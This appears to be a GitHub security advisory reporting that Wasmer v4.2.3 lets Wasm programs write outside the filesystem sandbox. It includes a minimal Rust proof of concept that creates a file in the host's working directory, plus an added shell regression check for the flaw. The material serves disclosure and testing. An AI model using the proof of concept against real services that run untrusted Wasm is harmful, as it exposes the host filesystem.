Headline
GHSA-4mq4-7rw3-vm5j: Filesystem sandbox not enforced
Summary
As of Wasmer version v4.2.3, Wasm programs can access the filesystem outside of the sandbox.
Details
https://github.com/wasmerio/wasmer/issues/4267
PoC
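A minimal Rust program:
    fn main() {
        // "abc" is a relative path. With no directory preopened via --dir,
        // this open should fail and unwrap() should panic.
        let f = std::fs::OpenOptions::new()
            .write(true)
            .create_new(true) // fail rather than reuse an existing file
            .open("abc")
            .unwrap();
    }
This should be compiled with cargo build --target wasm32-wasi. The compiled program, when run with wasmer WITHOUT --dir, can still create a file in the working directory.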
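A host-side regression check for the behaviour described above, added here as an example and not taken from the advisory or the Wasmer project. The function name check_no_host_writes and the poc.wasm path are assumptions; the check runs any command in an empty scratch directory and fails if the command left a file there.

```shell
#!/usr/bin/env bash
# Added example: verify that a command run WITHOUT --dir cannot write to the
# host working directory. Function name and paths are hypothetical.

# check_no_host_writes CMD [ARGS...]
# Returns 0 if the scratch working directory is still empty afterwards,
# 1 if the command created anything in it (sandbox not enforced),
# 2 if the scratch directory could not be created.
check_no_host_writes() {
    local scratch leaked status
    status=0
    scratch=$(mktemp -d) || return 2
    # Run in a subshell so the caller's working directory is unchanged.
    # The command's exit code is ignored: a correctly sandboxed PoC panics
    # on unwrap(), so a non-zero exit is the expected outcome.
    ( cd "$scratch" && "$@" ) >/dev/null 2>&1 || true
    leaked=$(ls -A "$scratch")
    if [ -n "$leaked" ]; then
        echo "FAIL: files created in host working directory:" >&2
        echo "$leaked" >&2
        status=1
    fi
    rm -rf "$scratch"
    return "$status"
}

# Usage against a real build (the module path is an assumption and must be
# absolute, because the command runs from the scratch directory):
#   check_no_host_writes wasmer run /abs/path/to/poc.wasm
```

A return value of 1 for the PoC module means the installed Wasmer build reproduces the issue.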
Impact
Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem.
References
- GHSA-4mq4-7rw3-vm5j
- wasmerio/wasmer#4267